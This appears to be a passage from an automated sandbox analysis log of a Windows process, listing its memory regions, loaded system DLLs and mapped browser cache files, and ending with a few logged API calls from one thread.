filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4746
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 4747
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 4748
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 4750
start_va = 0x630000
end_va = 0x72ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 4751
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4752
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4753
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4754
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4755
start_va = 0x620000
end_va = 0x62ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000620000"
filename = ""
Region:
id = 4756
start_va = 0x6d7b0000
end_va = 0x6d833fff
entry_point = 0x6d7b0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 4757
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 4758
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4759
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4760
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4761
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4762
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4763
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4764
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4765
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4766
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4767
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4768
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 4769
start_va = 0xc0000
end_va = 0x187fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 4770
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4771
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4772
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 4773
start_va = 0x190000
end_va = 0x190fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 4774
start_va = 0x1c0000
end_va = 0x1cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 4775
start_va = 0x250000
end_va = 0x350fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 4776
start_va = 0xd90000
end_va = 0x198ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d90000"
filename = ""
Region:
id = 4777
start_va = 0x470000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 4778
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4779
start_va = 0x730000
end_va = 0x8fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000730000"
filename = ""
Region:
id = 4780
start_va = 0x730000
end_va = 0x80efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000730000"
filename = ""
Region:
id = 4781
start_va = 0x8c0000
end_va = 0x8fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000008c0000"
filename = ""
Region:
id = 4782
start_va = 0x1a0000
end_va = 0x1a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 4783
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 4784
start_va = 0x900000
end_va = 0xa4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 4785
start_va = 0x1990000
end_va = 0x22bffff
entry_point = 0x1990000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 4786
start_va = 0x1b0000
end_va = 0x1b6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 4787
start_va = 0x1d0000
end_va = 0x1d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 4788
start_va = 0x22c0000
end_va = 0x26b2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000022c0000"
filename = ""
Region:
id = 4789
start_va = 0x360000
end_va = 0x3dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 4790
start_va = 0x900000
end_va = 0xa0cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 4791
start_va = 0xa10000
end_va = 0xa4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a10000"
filename = ""
Region:
id = 4792
start_va = 0xa50000
end_va = 0xb4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a50000"
filename = ""
Region:
id = 4793
start_va = 0xb50000
end_va = 0xd4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b50000"
filename = ""
Region:
id = 4794
start_va = 0x570000
end_va = 0x5f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4795
start_va = 0x810000
end_va = 0x892fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4796
start_va = 0x570000
end_va = 0x5f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4797
start_va = 0x810000
end_va = 0x896fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4798
start_va = 0x570000
end_va = 0x5f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4799
start_va = 0x810000
end_va = 0x89afff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4800
start_va = 0x570000
end_va = 0x5fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4801
start_va = 0x810000
end_va = 0x89efff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4802
start_va = 0x570000
end_va = 0x600fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4803
start_va = 0x810000
end_va = 0x8a2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4804
start_va = 0x570000
end_va = 0x604fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4805
start_va = 0x810000
end_va = 0x8a6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4807
start_va = 0x570000
end_va = 0x608fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4808
start_va = 0x810000
end_va = 0x8aafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4809
start_va = 0x570000
end_va = 0x60cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4843
start_va = 0x810000
end_va = 0x8aefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4844
start_va = 0x570000
end_va = 0x610fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4845
start_va = 0x810000
end_va = 0x8b2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4846
start_va = 0x570000
end_va = 0x614fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4847
start_va = 0x810000
end_va = 0x8b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4848
start_va = 0x570000
end_va = 0x618fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4849
start_va = 0x810000
end_va = 0x8bafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4858
start_va = 0x570000
end_va = 0x61cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 4859
start_va = 0x810000
end_va = 0x8befff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 4871
start_va = 0x26c0000
end_va = 0x2770fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4872
start_va = 0x2780000
end_va = 0x2832fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4873
start_va = 0x26c0000
end_va = 0x2774fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4874
start_va = 0x2780000
end_va = 0x2836fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4875
start_va = 0x26c0000
end_va = 0x2778fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4876
start_va = 0x2780000
end_va = 0x283afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4877
start_va = 0x26c0000
end_va = 0x277cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4879
start_va = 0x2780000
end_va = 0x283efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4880
start_va = 0x2840000
end_va = 0x2900fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 4881
start_va = 0x26c0000
end_va = 0x2782fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4884
start_va = 0x2790000
end_va = 0x2854fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4885
start_va = 0x26c0000
end_va = 0x2786fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4886
start_va = 0x2790000
end_va = 0x2858fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4892
start_va = 0x26c0000
end_va = 0x278afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4893
start_va = 0x2790000
end_va = 0x285cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4894
start_va = 0x26c0000
end_va = 0x278efff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4895
start_va = 0x2790000
end_va = 0x2860fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 4900
start_va = 0x2870000
end_va = 0x2942fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002870000"
filename = ""
Region:
id = 4901
start_va = 0x26c0000
end_va = 0x2794fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4906
start_va = 0x27a0000
end_va = 0x2876fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 4907
start_va = 0x26c0000
end_va = 0x2798fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4908
start_va = 0x27a0000
end_va = 0x287afff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 4912
start_va = 0x26c0000
end_va = 0x279cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4913
start_va = 0x27a0000
end_va = 0x287efff
entry_point = 0x0
region_type = private
name = "private_0x00000000027a0000"
filename = ""
Region:
id = 4914
start_va = 0x2880000
end_va = 0x2960fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 4918
start_va = 0x26c0000
end_va = 0x27a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4919
start_va = 0x27b0000
end_va = 0x2894fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 4920
start_va = 0x26c0000
end_va = 0x27a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4925
start_va = 0x27b0000
end_va = 0x2898fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 4926
start_va = 0x26c0000
end_va = 0x27aafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4930
start_va = 0x27b0000
end_va = 0x289cfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 4931
start_va = 0x26c0000
end_va = 0x27aefff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4932
start_va = 0x27b0000
end_va = 0x28a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027b0000"
filename = ""
Region:
id = 4936
start_va = 0x28b0000
end_va = 0x29a2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028b0000"
filename = ""
Region:
id = 4937
start_va = 0x26c0000
end_va = 0x27b4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4938
start_va = 0x27c0000
end_va = 0x28b6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 4942
start_va = 0x26c0000
end_va = 0x27b8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4943
start_va = 0x27c0000
end_va = 0x28bafff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 4948
start_va = 0x26c0000
end_va = 0x27bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4949
start_va = 0x27c0000
end_va = 0x28befff
entry_point = 0x0
region_type = private
name = "private_0x00000000027c0000"
filename = ""
Region:
id = 4950
start_va = 0x28c0000
end_va = 0x29c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028c0000"
filename = ""
Region:
id = 4953
start_va = 0x26c0000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4954
start_va = 0x27d0000
end_va = 0x28d4fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 4958
start_va = 0x26c0000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4959
start_va = 0x27d0000
end_va = 0x28d8fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 4960
start_va = 0x26c0000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4964
start_va = 0x27d0000
end_va = 0x28dcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 4965
start_va = 0x26c0000
end_va = 0x27cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000026c0000"
filename = ""
Region:
id = 4969
start_va = 0x28e0000
end_va = 0x29f2fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028e0000"
filename = ""
Region:
id = 4970
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4971
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4972
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4973
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4974
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4975
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4976
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 4977
start_va = 0x1e0000
end_va = 0x1e0fff
entry_point = 0x1e0000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 4978
start_va = 0x2a00000
end_va = 0x2afffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 4979
start_va = 0x1f0000
end_va = 0x1f0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 4980
start_va = 0x6d790000
end_va = 0x6d7a8fff
entry_point = 0x6d790000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 4981
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 4982
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 4983
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 4984
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 4990
start_va = 0x2b40000
end_va = 0x2b7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b40000"
filename = ""
Region:
id = 4991
start_va = 0x2c20000
end_va = 0x2d1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c20000"
filename = ""
Region:
id = 4992
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 4993
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 4994
start_va = 0x2d20000
end_va = 0x2feefff
entry_point = 0x2d20000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4995
start_va = 0x200000
end_va = 0x201fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000200000"
filename = ""
Region:
id = 4996
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 4997
start_va = 0x3e0000
end_va = 0x3e0fff
entry_point = 0x3e0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 5000
start_va = 0x3f0000
end_va = 0x3f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 5001
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 5002
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 5003
start_va = 0x3e0000
end_va = 0x3e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 5004
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 5005
start_va = 0x570000
end_va = 0x59bfff
entry_point = 0x570000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 5006
start_va = 0x5a0000
end_va = 0x5a7fff
entry_point = 0x5a0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 5007
start_va = 0x5b0000
end_va = 0x5bffff
entry_point = 0x5b0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 5008
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5009
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5010
start_va = 0x2ff0000
end_va = 0x320ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ff0000"
filename = ""
Region:
id = 5011
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 5012
start_va = 0x2ff0000
end_va = 0x317ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002ff0000"
filename = ""
Region:
id = 5013
start_va = 0x31d0000
end_va = 0x320ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000031d0000"
filename = ""
Region:
id = 5014
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 5015
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 5018
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 5019
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 5020
start_va = 0x2ff0000
end_va = 0x30affff
entry_point = 0x2ff0000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 5021
start_va = 0x3140000
end_va = 0x317ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003140000"
filename = ""
Thread:
id = 274
os_tid = 0x6e4
[0157.548] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0157.548] GetKeyboardType (nTypeFlag=0) returned 4
[0157.548] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
